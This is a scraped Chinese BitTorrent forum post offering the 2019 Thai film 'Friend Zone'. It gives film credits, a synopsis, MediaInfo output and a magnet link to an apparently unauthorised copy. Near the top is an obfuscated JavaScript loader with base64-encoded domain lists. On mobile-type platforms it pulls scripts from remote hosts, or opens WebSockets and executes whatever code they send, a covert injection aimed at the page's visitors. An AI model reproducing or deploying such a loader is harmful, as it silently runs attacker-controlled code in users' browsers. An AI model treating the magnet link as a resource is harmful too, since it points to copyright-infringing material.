友情以上[国语中字].Friend.Zone.2019.2160p.WEB-DL.H265.DDP5.1.2Audio 12.67GB

版主小s 26天前 182

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 友情以上 / 去吧!女神兵团(港) / 限时好友(台) / Friend Zone
◎片  名 Friend Zone ?????..????????????????
◎年  代 2019
◎产  地 泰国
◎类  别 喜剧 / 爱情
◎语  言 泰语
◎上映日期 2019-09-20(中国大陆) / 2019-02-14(泰国)
◎IMDb链接 https://www.imdb.com/title/tt9737688/
◎豆瓣评分 6.2/10 (53023人评价)
◎豆瓣链接 https://movie.douban.com/subject/30299356/
◎片  长 120分钟
◎导  演 查亚诺普·布恩帕拉科布 Chayanop Boonprakob (id:1337584)
◎编  剧 帕塔拉纳德·比博索瓦德 Pattaranad Bhiboonsawade (id:1420536)
       查亚诺普·布恩帕拉科布 Chayanop Boonprakob (id:1337584)
       汤萨蓬·逖提拿坎 Thodsapon Thiptinnakorn (id:1337585)
◎演  员 平采娜·乐维瑟派布恩 Pimchanok Leuwisetpaibul (id:1275794)
       奈哈·西贡索邦 Naphat Siangsomboon (id:1385525)
       杰森·杨 Jason Young (id:1420528)
       纳塔西特·科蒂马努瓦尼 Natsit Kothimanuswanit (id:1367256)
       本杰明·约瑟夫·瓦尼 Benjamin Joseph Varney (id:1389992)
       苏哈帕特·洛瓦查林 Sukhapat Lohwacharin (id:1420527)
       朱主爱 Joyce Chu (id:1359143)
       珐尤·珐尤·凯伊·提因 Phyu Phyu Kyaw Thein (id:1420532)
       劳拉·马姆 Laura Mam (id:1420534)
       奥黛丽·塔皮赫鲁 Audrey Tapiheru (id:1420537)
       坎蒂卡·阿比盖尔 Cantika Abigail (id:1420529)
       孟佳 Jia (id:1334335)
       克劳迪娅·巴雷托 Claudia Barretto (id:1420530)
       帕米 Palmy (id:1420535)
       黄明志 Namewee (id:1333506)
       南芬·英迪 Namfon Indee (id:1420531)
       芝芙 Chi Pu (id:1350190)

◎标  签 泰国 / 爱情 / 喜剧 / 恋爱 / 友情 / 青春 / 小清新 / 2019

◎简  介
  潘(奈哈·西贡索邦 Naphat Siangsomboon 饰)和琴(平采娜·乐维瑟派布恩 Pimchanok Leuwisetpaibul 饰)已经做了十多年的朋友了,曾经,他们亦有机会将这段友情升华成为爱情,然而,面对潘的表白,琴一口回绝,她认为两人还是更适合做朋友。                                    
                                于是,潘和琴成为了世界上最亲密的朋友。每当潘和他的女朋友们分手时,琴都会陪伴在潘的身边帮助他度过失恋期。而琴失联的时候,无论潘在世界的哪个角落,他也都会来到琴的身边。潘和琴的友谊是如此的坚定,甚至导致琴的男友泰德(杰森·杨 Jason Young 饰)大吃飞醋。一天,琴忽然问潘有没有想过如果有一天他们真的走到一起会怎样,对于他们来说,这会是另一段美好感情的开始,又或是终结呢?

  1. ##### MediaInfo ######
  2. General
  3. Complete name                            : 友情以上[email protected]OM.mp4
  4. Format                                   : MPEG-4
  5. Format profile                           : Base Media
  6. Codec ID                                 : isom (isom/iso2/mp41)
  7. File size                                : 12.7 GiB
  8. Duration                                 : 1 h 58 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 15.3 Mb/s
  11. Writing application                      : OurTV Multimedia Platform
  12. Video
  13. ID                                       : 1
  14. Format                                   : HEVC
  15. Format/Info                              : High Efficiency Video Coding
  16. Format profile                           : [email protected]@High
  17. Codec ID                                 : hev1
  18. Codec ID/Info                            : High Efficiency Video Coding
  19. Duration                                 : 1 h 58 min
  20. Bit rate                                 : 14.7 Mb/s
  21. Width                                    : 4 096 pixels
  22. Height                                   : 1 724 pixels
  23. Display aspect ratio                     : 2.40:1
  24. Frame rate mode                          : Variable
  25. Frame rate                               : 25.000 FPS
  26. Minimum frame rate                       : 25.000 FPS
  27. Maximum frame rate                       : 90 000.000 FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Bits/(Pixel*Frame)                       : 0.083
  32. Stream size                              : 12.2 GiB (96%)
  33. Codec configuration box                  : hvcC
  34. Audio #1
  35. ID                                       : 2
  36. Format                                   : E-AC-3
  37. Format/Info                              : Enhanced AC-3
  38. Commercial name                          : Dolby Digital Plus
  39. Codec ID                                 : ec-3
  40. Duration                                 : 1 h 58 min
  41. Bit rate mode                            : Constant
  42. Bit rate                                 : 256 kb/s
  43. Channel(s)                               : 6 channels
  44. Channel layout                           : L R C LFE Ls Rs
  45. Sampling rate                            : 48.0 kHz
  46. Frame rate                               : 31.250 FPS (1536 SPF)
  47. Compression mode                         : Lossy
  48. Stream size                              : 218 MiB (2%)
  49. Title                                    : 国语DDP5.1
  50. Language                                 : Chinese
  51. Service kind                             : Complete Main
  52. Default                                  : Yes
  53. Alternate group                          : 1
  54. Audio #2
  55. ID                                       : 3
  56. Format                                   : AAC LC
  57. Format/Info                              : Advanced Audio Codec Low Complexity
  58. Codec ID                                 : mp4a-40-2
  59. Duration                                 : 1 h 58 min
  60. Bit rate mode                            : Variable
  61. Bit rate                                 : 125 kb/s
  62. Maximum bit rate                         : 130 kb/s / 130 kb/s
  63. Channel(s)                               : 2 channels
  64. Channel layout                           : L R
  65. Sampling rate                            : 48.0 kHz
  66. Frame rate                               : 46.875 FPS (1024 SPF)
  67. Compression mode                         : Lossy
  68. Stream size                              : 107 MiB (1%)
  69. Title                                    : 泰语DDP2.0
  70. Language                                 : Thai
  71. Default                                  : No
  72. Alternate group                          : 1
  73. Audio #3
  74. ID                                       : 4
  75. Format                                   : AAC LC
  76. Format/Info                              : Advanced Audio Codec Low Complexity
  77. Codec ID                                 : mp4a-40-2
  78. Duration                                 : 1 h 58 min
  79. Bit rate mode                            : Constant
  80. Bit rate                                 : 192 kb/s
  81. Channel(s)                               : 2 channels
  82. Channel layout                           : L R
  83. Sampling rate                            : 44.1 kHz
  84. Frame rate                               : 43.066 FPS (1024 SPF)
  85. Compression mode                         : Lossy
  86. Stream size                              : 162 MiB (1%)
  87. Title                                    : 国语AAC2.0
  88. Language                                 : Chinese
  89. Default                                  : No
  90. Alternate group                          : 1


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:9BBEC3180729E1C210E87DB9D4C90EF2B8F5DB0C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回